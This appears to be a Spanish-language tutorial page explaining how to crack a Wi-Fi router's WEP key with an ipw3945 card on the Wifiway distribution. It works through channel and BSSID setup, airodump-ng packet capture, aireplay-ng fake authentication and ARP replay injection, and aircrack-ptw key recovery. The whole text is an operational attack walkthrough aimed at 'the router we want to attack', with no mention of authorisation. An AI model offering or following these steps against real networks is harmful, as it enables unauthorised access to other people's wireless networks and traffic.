Documentos de Académico
Documentos de Profesional
Documentos de Cultura
PASOS
Abrimos una consola
Código:
kwrite /sys/class/net/wifi0/device/channel
Importante: El canal AP debe corresponder al mismo canal del router que queremos
atacar, eso lo podeis ver cuando ejecutáis vuestro sistema operativo y buscais re
des wifi.
Canal de AP si pones 11 (11 es un ejemplo) normalmente muestra algunos puntos de
acceso cuando ejecutes airodump, guardamos y cerramos. Los canales oscilan de 1
a 13 aunque en algunas ocasiones he visto mas de 13.
Cogemos el BSSID del AP (router)
Código:
airodump-ng wifi0
Una vez aparezcan los BSSID pulsamos CTRL+C (para parar el proceso)
Código:
kwrite /sys/class/net/wifi0/device/bssid
Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay
incompatibilidades si cerramos.
Código:
airodump-ng -c CANAL DEL AP -w DATOS wifi0
Abrimos otra consola
Código:
kwrite /sys/class/net/wifi0/device/rate
Lo ponemos a 2, guardamos y cerramos.
Para ahorrarnos estos pasos os podeis DESCARGAR EL SIGUIENTE SCRIPT solo válido pa
ra la distribución de wifiway.
Para ejecutarlo poner en consola (shell) y seguir los pasos.
Código:
./ipw3945.sh
Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr cambiamos los " -
" por " : " (guiones por dos puntos)
Ejemplo: 12-58-47-FD-AD-8F-00-00-00-00 se cambia por 12:58:47:FD:AD:8F
Código:
ifconfig
Código:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
También podeis poner
Código:
aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0
de esta manera se asocia automáticamente cada 10 segundos para aquellos que pillai
s alguna ARP y luego no suben.
Una vez autentificados abrimos otra consola y ponemos
Código:
aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0
Esperamos un rato como mucho 15 minutos y veréis como suben los ARP.
El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el A
P0 pero no lo he probado.
Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1
Código:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Y lo ejecutáis de nuevo hasta que os autentifique o se os suban los ARP.
Si no autentifica fijaros que el RXQ (airodump-ng) se mantenga por encima del 50
% de no ser así los DATA no subirán rápido, normalmente es debido a que el ARP se encu
entra demasiado lejos.
Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejecutamos en otra
consola.
Código:
aircrack-ptw DATOS-01.cap
No es necesario parar los procesos para buscar la clave, puede seguir subiendo D
ATA por si acaso no encuentra la clave WEP y volver a intentarlo más adelante por
ejemplo con 150.000 DATA
Al cabo de un rato (un minuto como máximo) os saldrá KEY FOUND con la clave wep.
Salu2